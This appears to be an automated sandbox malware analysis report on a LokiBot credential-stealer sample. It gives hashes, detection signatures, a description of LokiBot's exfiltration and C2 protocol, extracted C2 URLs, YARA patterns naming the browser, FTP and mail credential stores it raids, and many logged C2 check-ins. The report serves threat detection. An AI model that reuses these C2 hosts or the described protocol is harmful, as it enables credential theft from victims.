Edit tour

Windows Analysis Report
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Overview

General Information

Sample name:	1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
Analysis ID:	1541921
MD5:	3fb350f4356f42b51a523b6fa8cbccf3
SHA1:	5f24115b8e734d11deea653df8b32c506c31f4b1
SHA256:	6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967
Tags:	base64-decodedexeuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe" MD5: 3FB350F4356F42B51A523B6FA8CBCCF3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 3 entries

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1682431268.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2948580807.000000000083E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x6307:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x9579:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 11 entries

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T10:20:02.412267+0200	2024312	1	A Network Trojan was detected	192.168.2.4	49730	94.156.177.220	80	TCP
2024-10-25T10:20:04.020146+0200	2024312	1	A Network Trojan was detected	192.168.2.4	49731	94.156.177.220	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T10:20:01.424022+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49730	94.156.177.220	80	TCP
2024-10-25T10:20:03.047948+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49731	94.156.177.220	80	TCP
2024-10-25T10:20:04.092936+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49732	94.156.177.220	80	TCP
2024-10-25T10:20:05.231108+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49733	94.156.177.220	80	TCP
2024-10-25T10:20:06.375575+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49734	94.156.177.220	80	TCP
2024-10-25T10:20:07.485394+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49735	94.156.177.220	80	TCP
2024-10-25T10:20:09.597188+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49736	94.156.177.220	80	TCP
2024-10-25T10:20:10.715160+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49737	94.156.177.220	80	TCP
2024-10-25T10:20:12.310127+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.220	80	TCP
2024-10-25T10:20:13.452612+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.220	80	TCP
2024-10-25T10:20:14.593029+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.220	80	TCP
2024-10-25T10:20:15.751617+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.220	80	TCP
2024-10-25T10:20:16.872789+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.220	80	TCP
2024-10-25T10:20:18.205156+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.220	80	TCP
2024-10-25T10:20:19.310464+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.220	80	TCP
2024-10-25T10:20:21.380407+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.220	80	TCP
2024-10-25T10:20:22.549457+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.220	80	TCP
2024-10-25T10:20:23.684073+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.220	80	TCP
2024-10-25T10:20:24.816660+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.220	80	TCP
2024-10-25T10:20:25.965151+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.220	80	TCP
2024-10-25T10:20:27.717963+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.220	80	TCP
2024-10-25T10:20:29.863609+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.220	80	TCP
2024-10-25T10:20:30.997406+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.220	80	TCP
2024-10-25T10:20:32.176322+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.220	80	TCP
2024-10-25T10:20:33.687799+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.220	80	TCP
2024-10-25T10:20:34.810261+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.220	80	TCP
2024-10-25T10:20:35.916782+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.220	80	TCP
2024-10-25T10:20:37.046303+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.220	80	TCP
2024-10-25T10:20:38.200499+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.220	80	TCP
2024-10-25T10:20:39.822243+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.220	80	TCP
2024-10-25T10:20:40.950583+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.220	80	TCP
2024-10-25T10:20:42.434571+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.220	80	TCP
2024-10-25T10:20:43.576012+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.220	80	TCP
2024-10-25T10:20:44.753726+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.220	80	TCP
2024-10-25T10:20:45.967783+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.220	80	TCP
2024-10-25T10:20:47.090625+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.220	80	TCP
2024-10-25T10:20:48.628754+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.220	80	TCP
2024-10-25T10:20:49.450869+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.220	80	TCP
2024-10-25T10:20:50.632516+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.220	80	TCP
2024-10-25T10:20:52.029076+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.220	80	TCP
2024-10-25T10:20:53.168380+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.220	80	TCP
2024-10-25T10:20:54.305428+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49777	94.156.177.220	80	TCP
2024-10-25T10:20:55.471024+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.220	80	TCP
2024-10-25T10:20:56.594180+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.220	80	TCP
2024-10-25T10:20:58.015959+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49782	94.156.177.220	80	TCP
2024-10-25T10:20:59.156243+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.220	80	TCP
2024-10-25T10:21:00.311298+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.220	80	TCP
2024-10-25T10:21:01.419074+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49805	94.156.177.220	80	TCP
2024-10-25T10:21:02.575992+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49811	94.156.177.220	80	TCP
2024-10-25T10:21:04.300437+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49822	94.156.177.220	80	TCP
2024-10-25T10:21:05.450685+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49828	94.156.177.220	80	TCP
2024-10-25T10:21:06.702578+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49836	94.156.177.220	80	TCP
2024-10-25T10:21:07.823534+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49842	94.156.177.220	80	TCP
2024-10-25T10:21:08.970566+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49851	94.156.177.220	80	TCP
2024-10-25T10:21:10.210497+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49858	94.156.177.220	80	TCP
2024-10-25T10:21:11.347066+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49864	94.156.177.220	80	TCP
2024-10-25T10:21:12.693350+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49871	94.156.177.220	80	TCP
2024-10-25T10:21:13.812456+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49877	94.156.177.220	80	TCP
2024-10-25T10:21:14.957762+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49883	94.156.177.220	80	TCP
2024-10-25T10:21:16.552285+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49894	94.156.177.220	80	TCP
2024-10-25T10:21:17.694981+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49900	94.156.177.220	80	TCP
2024-10-25T10:21:19.204894+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49910	94.156.177.220	80	TCP
2024-10-25T10:21:20.326057+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49917	94.156.177.220	80	TCP
2024-10-25T10:21:21.441410+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49924	94.156.177.220	80	TCP
2024-10-25T10:21:22.907366+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49934	94.156.177.220	80	TCP
2024-10-25T10:21:24.073735+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49940	94.156.177.220	80	TCP
2024-10-25T10:21:25.575978+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49947	94.156.177.220	80	TCP
2024-10-25T10:21:26.705064+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49954	94.156.177.220	80	TCP
2024-10-25T10:21:27.827107+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49963	94.156.177.220	80	TCP
2024-10-25T10:21:28.952302+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49969	94.156.177.220	80	TCP
2024-10-25T10:21:30.120093+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49975	94.156.177.220	80	TCP
2024-10-25T10:21:31.244679+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.220	80	TCP
2024-10-25T10:21:32.352236+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.220	80	TCP
2024-10-25T10:21:33.496323+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49998	94.156.177.220	80	TCP
2024-10-25T10:21:34.650472+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50005	94.156.177.220	80	TCP
2024-10-25T10:21:35.782292+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50014	94.156.177.220	80	TCP
2024-10-25T10:21:36.922599+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50021	94.156.177.220	80	TCP
2024-10-25T10:21:38.071599+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50027	94.156.177.220	80	TCP
2024-10-25T10:21:39.204843+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50033	94.156.177.220	80	TCP
2024-10-25T10:21:40.499810+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50039	94.156.177.220	80	TCP
2024-10-25T10:21:41.653914+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50050	94.156.177.220	80	TCP
2024-10-25T10:21:42.775266+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50056	94.156.177.220	80	TCP
2024-10-25T10:21:43.937769+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50062	94.156.177.220	80	TCP
2024-10-25T10:21:45.077227+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.220	80	TCP
2024-10-25T10:21:46.202323+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50078	94.156.177.220	80	TCP
2024-10-25T10:21:47.377458+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50085	94.156.177.220	80	TCP
2024-10-25T10:21:48.502508+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50088	94.156.177.220	80	TCP
2024-10-25T10:21:49.659829+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50089	94.156.177.220	80	TCP
2024-10-25T10:21:51.498324+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50090	94.156.177.220	80	TCP
2024-10-25T10:21:52.518212+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50091	94.156.177.220	80	TCP
2024-10-25T10:21:53.649173+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50092	94.156.177.220	80	TCP
2024-10-25T10:21:54.809440+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50093	94.156.177.220	80	TCP
2024-10-25T10:21:55.924734+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50094	94.156.177.220	80	TCP
2024-10-25T10:21:57.172837+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50095	94.156.177.220	80	TCP
